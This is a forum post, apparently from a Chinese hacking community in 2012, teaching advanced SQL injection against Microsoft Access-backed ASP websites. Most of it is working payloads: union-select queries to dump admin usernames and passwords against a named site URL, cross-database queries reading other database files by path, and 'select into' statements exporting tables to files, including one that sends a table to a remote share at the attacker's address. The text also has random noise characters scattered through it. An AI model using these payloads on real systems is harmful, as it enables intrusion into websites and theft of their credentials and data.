找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2129|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------0 o: Z8 J9 Q( E) E7 M3 f% g8 }
union查询法0 }6 f, U& L5 \
首先要说的就是查询办法,一般的查询办法就是
' X6 j5 t6 U( R9 y/ A6 ]
8 L' q7 g% I" O+ p程序代码
5 f( o. X! z: {' @& y2 s* M9 rand 1=(select count(*) from admin where left(id,1)='1')
" F, `* A$ k6 r) }# `" H. r! Q
. T% b1 ^8 d, m3 r8 G这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.1 u3 B& ~/ [( \4 a. t
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
6 h3 u, F$ K# r譬如你有一个ACCESS点:9 @- f: _7 E( t" m0 `. G+ \
程序代码$ P$ S# _$ A1 h+ h3 T0 M% s$ ?
http://bbs.tian6.com/xiaoyang.asp?coder=1
/ c% l" H& @: E2 M. i9 m& p9 `8 a$ Y2 T
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
, O, q: W. ?0 _8 R/ |  B然后我们直接来:5 a0 \2 T" S0 v
程序代码
8 {/ x- }' P# `( K+ d6 phttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]' u. B5 G( F0 U9 d

3 E4 Q- k) U$ d4 W  q2 g! v& b这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
: M6 r2 U1 }1 ?* N. W1 {
% {! T3 [5 d9 Z5 e& m6 q$ w% ]+ p9 D3 g0 S) C

( E  ~* {- X5 S' R0 R" q' ~. Y---------------------------------------------------------------
) ]9 ^3 `% j3 N8 i# LAccess跨库查询
8 E, J2 }$ x# o  a* }+ H7 h有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
4 |' s3 ?/ s: D3 B跨库的查询语句:! u! w$ e# i. Q0 j9 k/ V2 F, y, G
子查询:
9 Z; |- p3 A; S- v7 B程序代码
9 b  T* d) h* |and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
& S9 ^+ W6 L0 l; ]4 S" s
) e4 n. ]. `, N! r6 {5 m% junion查询:: j. {% y9 T: ]& j9 p" t
程序代码
7 @: {$ D1 l1 Vunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1  W4 r7 [" H& H; ?' u0 G# K# l
7 l+ y& I/ z. D7 G/ e& ?+ h6 B& g3 G
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
) l* M! i9 L( a8 R程序代码
6 x: W5 Z; o! a9 k* Rhttp://www.4ngel.net/article/46.htm ( o/ j  {; A2 Z- a; K
http://hf110.com/Article/hack/rqsl/200502/66.html5 I7 }  i1 R$ N5 H
4 E* M: N! Y3 R, A1 ~' _" V
---------------------------------------------------------------* ?3 y9 {4 r9 q
Access注入,导出txt,htm,html* M# L7 G# M% V2 ]9 Y. t
子查询语句:; u  ^- g% @. H3 U  j( }
程序代码5 g. Q2 @1 K( ~0 v) x6 x( G
Select * into [test.txt] in 'd:\web\' 'text;' from admin; g( B' r; Q  S0 F9 m' t

+ e" V' B0 }" S: _! u这样就把admin表的内容以test类型存进了d:\web里面.
; `% d1 W& R# a1 k5 q  `UNION查询:$ N; S$ A  m1 M: u5 |
程序代码8 X& k! R  k* ^2 I
union select * into [admin.txt] in 'c:\' 'test;' from admin
/ f2 d3 }; k8 b0 G( N1 k, P5 a. E
, G$ t3 h% J7 z6 Y8 |: e3 q$ h而且这里也可以保存到本地来:
; {1 t, H6 Q* O, C3 i程序代码: R$ c; t6 |$ V1 ~. X( L7 R. n5 f
Select * into [test.txt] in '\\yourip\share' 'text;' from admin  @8 h% G4 C1 f1 C6 `/ o

+ _, a+ z; X9 j) L2 P0 `不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:, E1 u2 y% `! `. M$ ^; a

# T& ?: l% u; D程序代码. Y. o" M9 ]: D3 W0 d! i3 y5 S
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
7 o* Y" e/ P6 P( s6 q# z
2 V$ ?! @' Y8 `* W7 u因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.! i1 ~' C3 k5 `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表